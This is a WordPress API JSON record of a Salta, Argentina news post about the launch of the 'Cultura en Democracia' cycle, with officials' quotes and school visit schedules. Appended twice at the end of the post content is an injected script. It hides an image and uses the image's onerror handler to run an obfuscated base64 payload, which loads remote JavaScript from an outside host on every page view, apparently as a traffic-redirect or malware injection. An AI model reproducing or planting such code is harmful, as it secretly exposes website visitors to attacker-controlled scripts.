{"id":2372,"date":"2023-03-21T11:31:33","date_gmt":"2023-03-21T14:31:33","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2372"},"modified":"2025-08-14T00:20:53","modified_gmt":"2025-08-14T03:20:53","slug":"se-realizo-el-lanzamiento-del-ciclo-cultura-en-democracia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2372","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-realizo-el-lanzamiento-del-ciclo-cultura-en-democracia-88601\">Se realiz\u00f3 el lanzamiento del ciclo \u201cCultura en Democracia\u201d<\/a>"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#7a072d\"><em>En la Casa de la Cultura tuvo lugar el lanzamiento del ciclo anual en conmemoraci\u00f3n de los 40 a\u00f1os ininterrumpidos de Democracia.<\/em><\/h3>\n\n\n\n<p>Los procesos culturales desde sus diferentes disciplinas y con sus diversos protagonistas, aportan un valor fundamental y constante para la construcci\u00f3n, sostenimiento y multiplicaci\u00f3n de los valores democr\u00e1ticos. En este sentido, 40 a\u00f1os ininterrumpidos de democracia representan el per\u00edodo democr\u00e1tico m\u00e1s largo de nuestra historia, a\u00f1os donde supimos conquistar y reconstruir lazos sociales y culturales como argentinos.<\/p>\n\n\n\n<p>En esta ocasi\u00f3n, la Secretar\u00eda de Cultura de la Provincia de Salta se propone llevar adelante un ciclo anual que fomenta y fortalece las pr\u00e1cticas culturales diversas, participativas y federales. Este ciclo tambi\u00e9n abrir\u00e1 canales que posibiliten la reflexi\u00f3n de diferentes aspectos y desaf\u00edos de la vida contempor\u00e1nea.<\/p>\n\n\n\n<p>El&nbsp;<strong>secretario de Cultura, Diego Ashur,<\/strong>&nbsp;declar\u00f3 que \u201ca partir de este mes y hasta noviembre, este ciclo nos permitir\u00e1 reflexionar sobre la Democracia mediante el debate y las expresiones art\u00edsticas. \u2018Cultura en Democracia\u2018 reivindica 40 a\u00f1os ininterrumpidos de nuestro sistema representativo y celebra la posibilidad de consensuar en funci\u00f3n del disenso, la pluralidad y las diversas voces que representan la cultura y el arte en nuestro pa\u00eds y la provincia\u201d.<\/p>\n\n\n\n<p>Por su parte, la&nbsp;<strong>secretaria de Derechos Humanos, Mariana Reyes<\/strong>, se\u00f1al\u00f3 \u201cvamos a dar debates, vamos a hablar de discursos del odio, tem\u00e1ticas de Derechos Humanos, Memoria, Verdad y Justicia. Creo importante dar el debate con los j\u00f3venes, transmitir y trasladar lo que sucedi\u00f3 en Argentina en un momento muy doloroso para nuestro pa\u00eds, c\u00f3mo hemos transitado a lo largo de los a\u00f1os adquiriendo m\u00e1s derechos, reforzando la Democracia. 40 a\u00f1os ininterrumpidos son para celebrar, dar debate y sostenerlo, levantar las banderas con el compromiso de toda la sociedad\u201d.&nbsp;<\/p>\n\n\n\n<p>Finalmente,&nbsp; la secretaria de las Mujeres, G\u00e9neros y Diversidad, Itat\u00ed Carrique, manifest\u00f3 \u201cagradecemos a la Secretar\u00eda de Cultura por habernos invitado a ser parte de esta agenda de actividades que conmemora los 40 a\u00f1os de democracia en Argentina; qu\u00e9 importante es hablar de las mujeres y diversidades en ese camino y al d\u00eda de hoy, ya que los derechos conquistados pudieron ser alcanzados porque estamos en democracia\u201d.<\/p>\n\n\n\n<p>Y en ese sentido, invit\u00f3 a todas y a todos \u201ca participar del evento \u2018Nosotras Movemos el Mundo\u2018 que se llevar\u00e1 adelante en Salta con una gran variedad de propuestas, a los fines de que las mujeres y LGBTIQ+ se asuman como protagonistas en la construcci\u00f3n de una sociedad m\u00e1s justa e igualitaria. La cita es el 29 de marzo, en la Usina Cultural\u201d.<\/p>\n\n\n\n<p><strong>\u00abEntretejiendo lazos: mujeres y diversidades protagonistas en los 40 a\u00f1os de democracia\u00bb<\/strong><br><br>Durante esta primera etapa se realizar\u00e1 en la Usina Cultural el programa \u00abEntretejiendo lazos: mujeres y diversidades protagonistas en los 40 a\u00f1os de democracia\u00bb para estudiantes de colegios secundarios de la ciudad de Salta y alrededores.<\/p>\n\n\n\n<p>La experiencia tiene como premisa ser un dinamizador que abone la reflexi\u00f3n, tanto en las aulas como para con el p\u00fablico en general, sobre lo transitado en esta etapa democr\u00e1tica, y poniendo tensi\u00f3n en el concepto de Memoria, Pasado y desaf\u00edos presentes y futuros.&nbsp;<\/p>\n\n\n\n<p>La propuesta constar\u00e1 en una exposici\u00f3n\/experiencia con diversos espacios de exploraci\u00f3n e intercambio. Comenzar\u00e1 con una l\u00ednea de tiempo enriquecida con instalaciones art\u00edsticas que dan cuenta de hitos fundamentales en materia de derechos conquistados en democracia, y apropiaci\u00f3n del espacio p\u00fablico como proceso de lucha.<\/p>\n\n\n\n<p>La visita finalizar\u00e1 con la construcci\u00f3n del \u201cTelar de la Democracia\u201d, en el que las\/os estudiantes se sumar\u00e1n a la confecci\u00f3n de un telar con la t\u00e9cnica de patchwork, que ser\u00e1 desplegado el d\u00eda de cierre de la experiencia, buscando reforzar el concepto de comunidad y entretejido social, a partir del trabajo colectivo.<\/p>\n\n\n\n<p>Cabe destacar que la curadur\u00eda de contenidos, fue realizada en forma conjunta con la Secretar\u00eda de Mujeres, G\u00e9nero y Diversidad y el Observatorio de Violencia contra las Mujeres.<\/p>\n\n\n\n<p>Durante los d\u00edas lunes 27 y martes 28 de marzo, se ver\u00e1 enriquecida con el desembarco de la muestra federal e itinerante, Nosotras Movemos el Mundo, impulsado por el Ministerios de las Mujeres, G\u00e9neros y Diversidad de Naci\u00f3n, del que participar\u00e1n expositoras y artistas locales como parte de una pol\u00edtica nacional, reuniendo y visibilizando creaciones y expresiones culturales con perspectiva de g\u00e9nero y diversidad.<\/p>\n\n\n\n<p><strong>Horarios y contactos para Escuelas<\/strong><\/p>\n\n\n\n<p>Turno Ma\u00f1ana: de 9 a 10:30 hs o de 10:30 a 12 hs.<\/p>\n\n\n\n<p>Turno Tarde: de 14 a 15:30 hs o de 15:30 a 17 hs.<\/p>\n\n\n\n<p>Las inscripciones se recibir\u00e1n hasta el martes 21 de marzo, a las 23:59 hs a trav\u00e9s de las siguientes v\u00edas:&nbsp;promocioncultural@culturasalta.gov.ar&nbsp;o al 0387-4318182 de 8 a 19 hs.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"583\" data-id=\"2373\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2864-cultura-en-democracia-1024x583.jpg\" alt=\"\" class=\"wp-image-2373\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2864-cultura-en-democracia-1024x583.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2864-cultura-en-democracia-300x171.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2864-cultura-en-democracia-768x438.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2864-cultura-en-democracia-696x397.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2864-cultura-en-democracia-737x420.jpg 737w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2864-cultura-en-democracia.jpg 1053w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"595\" data-id=\"2375\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2865-cultura-en-democracia-1024x595.png\" alt=\"\" class=\"wp-image-2375\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2865-cultura-en-democracia-1024x595.png 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2865-cultura-en-democracia-300x174.png 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2865-cultura-en-democracia-768x446.png 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2865-cultura-en-democracia-696x404.png 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2865-cultura-en-democracia-723x420.png 723w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2865-cultura-en-democracia.png 1033w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"953\" height=\"600\" data-id=\"2374\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2866-cultura-en-democracia.jpg\" alt=\"\" class=\"wp-image-2374\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2866-cultura-en-democracia.jpg 953w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2866-cultura-en-democracia-300x189.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2866-cultura-en-democracia-768x484.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2866-cultura-en-democracia-696x438.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/03\/2866-cultura-en-democracia-667x420.jpg 667w\" sizes=\"(max-width: 953px) 100vw, 953px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En la Casa de la Cultura tuvo lugar el lanzamiento del ciclo anual en conmemoraci\u00f3n de los 40 a\u00f1os ininterrumpidos de Democracia. Los procesos culturales desde sus diferentes disciplinas y con sus diversos protagonistas, aportan un valor fundamental y constante para la construcci\u00f3n, sostenimiento y multiplicaci\u00f3n de los valores democr\u00e1ticos. En este sentido, 40 a\u00f1os [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2377,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2372","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2372"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2372"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2372\/revisions"}],"predecessor-version":[{"id":7141,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2372\/revisions\/7141"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2377"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2372"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2372"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2372"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}